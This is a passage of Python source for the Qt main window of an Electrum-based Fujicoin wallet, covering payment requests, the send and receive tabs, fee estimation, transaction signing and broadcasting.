self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Fujicoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Fujicoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Fujicoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
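# Slider callback: persist the selected fee level (dynamic fees) or fee rate (static),
# mirror it into the fee-rate edit, and recompute the transaction fee.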
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
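# When the feerate field is frozen (or the slider drives the feerate), the
# displayed fee is derived as fee = feerate * size; otherwise the fee field
# drives and feerate = fee / size. Illustrative arithmetic: at 10 sat/byte
# and an estimated size of 225 bytes the displayed fee would be 2250 sat;
# the actual fee may differ slightly, which is what the rounding icon below
# indicates.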
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the wrapped
function as the 'password' keyword argument. A password of None means
either that the wallet is unencrypted or that the user cancelled the
password request; an empty input is passed as the empty string.'''
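# Usage sketch (as used further below in this file):
#
#     @protected
#     def sign_tx(self, tx, callback, password):
#         self.sign_tx_with_password(tx, callback, password)
#
# The decorator prompts for the password (when the keystore is encrypted)
# and passes it to the wrapped method as the 'password' keyword argument.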
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
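# A fee/feerate field counts as "frozen" when it is visible, was modified by
# the user, and is either non-empty or currently focused. In
# get_send_fee_estimator() below a frozen absolute fee takes precedence over
# a frozen feerate.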
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
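# e.g. a user-entered 5 sat/byte becomes 5000 sat/kilobyte here (illustrative)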
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Fujicoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Fujicoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
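# Signing runs as a WaitingDialog task; on_success/on_failure forward a
# True/False result to the callback once the task finishes. Plugins may wrap
# on_success via the 'tc_sign_wrapper' hook.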
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
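# Runs the broadcast coroutine on the network's event loop. If this payment
# came from a BIP70 payment request, the invoice is marked as paid and the
# payment message is sent back with a refund address, waiting up to 20
# seconds for the merchant's ack.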
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
